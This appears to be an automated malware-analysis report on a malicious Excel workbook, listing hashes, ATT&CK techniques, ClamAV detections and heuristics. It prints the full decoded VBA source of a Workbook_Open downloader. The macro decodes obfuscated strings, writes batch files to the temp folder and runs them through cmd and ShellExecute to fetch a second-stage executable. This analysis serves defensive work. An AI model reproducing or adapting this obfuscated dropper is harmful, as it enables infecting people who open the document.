Office (OOXML) malware analysis — malicious · 1feefebfacf95426

MALICIOUS

Office (OOXML)

39.4 KB Created: 2018-10-16 16:44:32 UTC Authoring application: Microsoft Excel 12.0000 First seen: 2020-02-04

MD5: 5a97ecacbd069de57dd3157771a93bc4 SHA-1: 93a16e6a0dfddb45c400972fa11ec982d3a71bde SHA-256: 1feefebfacf954266e96975cc69e70d752cf873f3bdd26c69e47c640b03b5744

156 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1059 Command and Scripting Interpreter

The sample is an Excel document containing a Workbook_Open VBA macro. This macro is designed to construct a path to a temporary executable file and download a second-stage payload. The script uses obfuscated string concatenation to build the download URL and executable path, indicating a downloader functionality. The presence of a Workbook_Open macro and the execution of a downloaded payload are strong indicators of malicious intent.

Heuristics 4

ClamAV: Doc.Malware.Generic-6883284-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Generic-6883284-0
VBA project inside OOXML medium 2 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro

Matched line in script

Dim ql1, ql2, ql3, ql4, ql5 As String
Sub workbook_open()
#Const CVV = "34567_8989"

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
    NameLoad = ""
    romp = Environ("tmp")
```

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	10505 bytes
SHA-256: `28058f7e4fa0802e947ce35a95698eb634402ccf7e7c1d53d24afdc590bbffe7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit #If Win64 Then Private Declare PtrSafe Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As Long ''PtrSafe #Else Private Declare Function GetVersionEx Lib "kernel32" Alias "GetVersionExA" (lpVersionInformation As OSVERSIONINFO) As Long ''PtrSafe #End If Private Type OSVERSIONINFO dwOSVersionInfoSize As Long dwMajorVersion As Long dwMinorVersion As Long dwBuildNumber As Long dwPlatformId As Long szCSDVersion As String * 128 End Type Dim NameJob As String Dim NameApp As String Dim TT As String Dim NameLoad As String Dim Count As Byte Dim ql1, ql2, ql3, ql4, ql5 As String Sub workbook_open() #Const CVV = "34567_8989" #If v = "8890/9200=op" Or v = "ffgr.17763.RTG" Then ''MsgBox "ok" #Else ''MsgBox "else" #End If Dim SSS As Integer NameJob = "" Count = 0 NameApp = "" NameLoad = "" Forsa 2000 End Sub Sub Forsa(ROUD As Integer, Optional NXT As Byte = 0) Dim ff Dim romp As String If ROUD = 20 * 100 Then VerWin Count = 0 NameApp = "" NameLoad = "" romp = Environ("tmp") ql1 = Gluma("a2c%\/%a2c%\a%adow%\t%\r%YieVce/Y3bwbms2yp3.embxc2eV sns%Yms2oY3", "ndm e3Vc2%syrapYbw/xot.i\") + GetRandName(10) + GetRandExp() + _ Gluma("ettegp3b&g4r%aao3\m.vpettegp3b&g4r%aao3 m.vpettegp3b&g4r%aao32m.vp", "3p2ram &\%vbet4go.") ql2 = Gluma("n/em2wmn/em2nm-riamoim.mhhhcwdiagpntcn /", "hi.m-dtrc/oegwn2 pa") + Chr(13) + Chr(10) + Gluma("s qo(hhlhe(=(eoggmq.u(rqn0ugh0var(%i)%lctq(eu(q.u(rqn0uguyvu(rhlr0hfrv)lhat", "ur(%anyh.o0vfi)lm= stecgq") ql3 = Gluma("e itcote itcet/m rud/tc/t", "/eodmtcrui ") + GetRandTime(3) + Gluma("a&o%nbk/ma\\arpkter ", "ne&rtaok\bp/%m ") + NameApp + Gluma("t /sfrneast", " en/fstar") + _ GetRandJName(10) + Gluma("yowq p%qiwyofahqahldyrh/ryrllftoo:gin:ola.h\.%.sy:l.ef:m", "sqleyang%.dip/:\whfotm r") + GetRandName2(11) + GetRandExp() ql4 = Gluma("/ret ct/ret /tiorudmit it", "dur/toemc i") + GetRandTime(4) + Gluma("/atp&mor\/ee/nko bn%", "&n/p\metab% okr") + NameLoad + _ Gluma("lddlt2vl ml gl&12b\&r%appq23/.f1l&12b\&r%appq2o/.f1l&12b\&r%appq2e/.f1", "gt2rbl%1oa.v&3pf/qde\m ") + _ Gluma("g avo\ tm4ee5vbp.rag avo\ tm4ee5v%p.rag avo\ t", "p%ambv\ ro.5tg4e") + NameApp + GetRandExp() ql5 = Gluma("ireud/uireudiucor mtcudcu", "rd tim/euco") + GetRandTime(13) + Gluma("nmt/\&p anbbnrkpeor%", "ekr/n\pa&mt%o b") + NameApp + _ Gluma("STNoP/gemgtmouu rsogiPS", "Ngm ei/tsSorTPu") + NameJob + _ Gluma("m %%mppmte\&2t5", "&t2\m%pe 5") + NameApp + Gluma("iRy etSal eDMn r/Mi", "eRMaSD lt/ynir") + NameJob + " 4" With Form1 .Label2 = ql3 .Label3 = ql4 .Label4 = ql5 End With ff = FreeFile Open romp + "\groove1.bat" For Output As #ff Print #ff, ql1 Close #ff ff = FreeFile Open romp + "\groove2.bat" For Output As #ff Print #ff, ql2 Close #ff ff = FreeFile Open romp + "\groove3.bat" For Output As #ff Print #ff, ql3 Close #ff ff = FreeFile Open romp + "\groove4.bat" For Output As #ff Print #ff, ql4 Close #ff ff = FreeFile Open romp + "\groove5.bat" For Output As #ff Print #ff, ql5 Close #ff End If romp = "llkjJHghhhcj^^^8834jhjHGG1244h__++" ql3 = "srfertgUTYYTYtdswgefhhu45" ql4 = "KJHJGHHGhghhsdgfg7^&^&%555df" End Sub Function VerWin() As String 'dfdf6745 End Function Function Gluma(ES As String, MK As String, Optional Oset As Integer = 6) As String Dim I, CurPosSym, Offset As Integer Dim CurSymbol, NewSymbol As String Dim NewString As String Dim TEST1 As String Offset = Oset NewString = "" For I = 1 To Len(ES) CurSymbol = Mid(ES, I, 1) CurPosSym = InStr(1, MK, CurSymbol) If CurPosSym - Offset > 0 Then NewSymbol = Mid(MK, CurPosSym - Offset, 1) Else NewSymbol = Mid(MK, CurPosSym + Len(MK) - Offset, 1) End If NewString = NewString + NewSymbol Next I Gluma = NewString End Function Function GetRandTime(minT As Integer) As String Dim R As Integer Randomize R = Int(Rnd * 3) + minT ''TT = CStr(R) GetRandTime = CStr(R) End Function Function GetRandName(C As Integer) As String Dim R, I As Integer Dim S, tS As String Randomize S = "" tS = "" If C <= 4 Then C = Int((16 - 5 + 1) * Rnd + 5) For I = 4 To C R = Int((126 - 33 + 1) * Rnd + 33) Select Case R Case 37, 38, 34, 42, 47, 58, 60, 62, 63, 92, 124, 38, 43, 44, 59, 61, 40, 41: R = 48 ''Case 65 To 90: End Select tS = Chr(R) S = S + tS tS = "" Next I ''S = Chr(34) + S + Chr(34) NameApp = S Count = Count + 1 GetRandName = S End Function Function GetRandName2(C As Integer) As String Dim R, I As Integer Dim S, tS As String Randomize S = "" tS = "" If C <= 4 Then C = Int((16 - 5 + 1) * Rnd + 5) For I = 4 To C R = Int((126 - 33 + 1) * Rnd + 33) Select Case R Case 37, 38, 34, 42, 47, 58, 60, 62, 63, 92, 124, 38, 43, 44, 59, 61, 40, 41: R = 48 ''Case 65 To 90: End Select tS = Chr(R) S = S + tS tS = "" Next I ''S = Chr(34) + S + Chr(34) NameLoad = S Count = Count + 1 GetRandName2 = S End Function Function GetRandPath() End Function Function GetRandExp(Optional N As Byte) GetRandExp = Chr(46) + Chr(101) + Chr(120) + Chr(101) End Function Private Sub Document_Close() End Sub Function GetRandJName(C As Integer) As String Dim R, I As Integer Dim S, tS As String Randomize S = "" tS = "" If C <= 5 Then C = Int((16 - 6 + 1) * Rnd + 6) For I = 5 To C R = Int((122 - 65 + 1) * Rnd + 65) Select Case R Case 91 To 96: R = 65 ''Case 65 To 90: End Select tS = Chr(R) S = S + tS tS = "" Next I S = "HondaDa" ''S = Chr(34) + S + Chr(34) NameJob = S GetRandJName = S End Function Private Sub Document_New() End Sub Private Sub Workbook_BeforeClose(Cancel As Boolean) With Form1.Label1 If .Width + .Top > 90 Then .Caption = ql1 ql1 = "kjJHGGGghjdkk" 'MsgBox ("123") Form1.Label1_Click End If End With End Sub Private Sub Workbook_BeforePrint(Cancel As Boolean) End Sub Private Sub Workbook_Deactivate() End Sub Private Sub Workbook_NewSheet(ByVal Sh As Object) End Sub Private Sub Workbook_SheetChange(ByVal Sh As Object, ByVal Target As Range) End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Attribute VB_Name = "Form1" Attribute VB_Base = "0{D3CB86E9-6312-4184-B384-91BF9A87C001}{ED77D350-7BBB-4C1E-B402-B10DE997549B}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Option Explicit #If Win64 Then Private Declare PtrSafe Function ShellExecute Lib "shell32" _ Alias "ShellExecuteA" (ByVal hwnd As Long, _ ByVal lpOperation As String, ByVal lpFile As String, _ ByVal lpParameters As String, ByVal lpDirectory As String, _ ByVal nShowCmd As Long) As Long Private Const SWN = 1 #Else Private Declare Function ShellExecute Lib "shell32" _ Alias "ShellExecuteA" (ByVal hwnd As Long, _ ByVal lpOperation As String, ByVal lpFile As String, _ ByVal lpParameters As String, ByVal lpDirectory As String, _ ByVal nShowCmd As Long) As Long Private Const SWN = 1 #End If Private Sub Plasta1111_Change() Dim lola, mora As String Dim j1, j2 As Integer If Plasta1111.Width > Plasta111.Width + Plasta11.Width + Plasta1.Width Then lola = Label1.Caption mora = Label4.Caption 'MsgBox ("4") j1 = SRAT22(0, "cmd", lola, 0) j2 = SRAT22(0, "cmd", mora, 0) End If End Sub Private Sub Plasta111_Change() Dim QQ As String If Plasta11.Width > Plasta11.Height + 12 Then QQ = Label2.Caption Plasta1111.Text = "KLKLKJhhshdhjj34k8887712hHHJJhyhhsd" End If End Sub Private Sub Label3_Click() Dim GG As Integer GG = 2135 End Sub Private Sub Plasta11_Change() Dim OO0 As String If Plasta111.Width > 25 Then OO0 = CStr(Label1.Caption) Plasta111.Text = "jjjsghd&&&(9934jjjggghjHGFF%%$#@@^&&" End If End Sub Public Sub Label1_Click() Plasta1.Value = 93491 End Sub Function SRAT22(ByVal pid As Integer, ByVal pam1 As String, ByVal pam2 As String, pamW As Integer) As Integer If Len(pam1) = 3 And Asc(Mid(pam1, 2, 1)) = 109 Then SRAT22 = ShellExecute(pid, vbNullString, pam1, pam2, Application.Path, pamW) End If SRAT22 = 101 End Function Private Sub Plasta1_Change() If Plasta11.Height > 3 Then Plasta11.Text = "kkHHggg7736%$$767384jjhGFtgty34" End If End Sub Private Sub UserForm_Click() Dim KL1 As String KL1 = "HHGFfhshjHG$$%^&123ujHHTThjjsdlkjhggdf" End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	41984 bytes
SHA-256: `96ff0c463968a67f05708f0664fcf4aed56a57e1410520a1b93567c0c096bf06`
Detection ClamAV: Doc.Malware.Generic-6883284-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.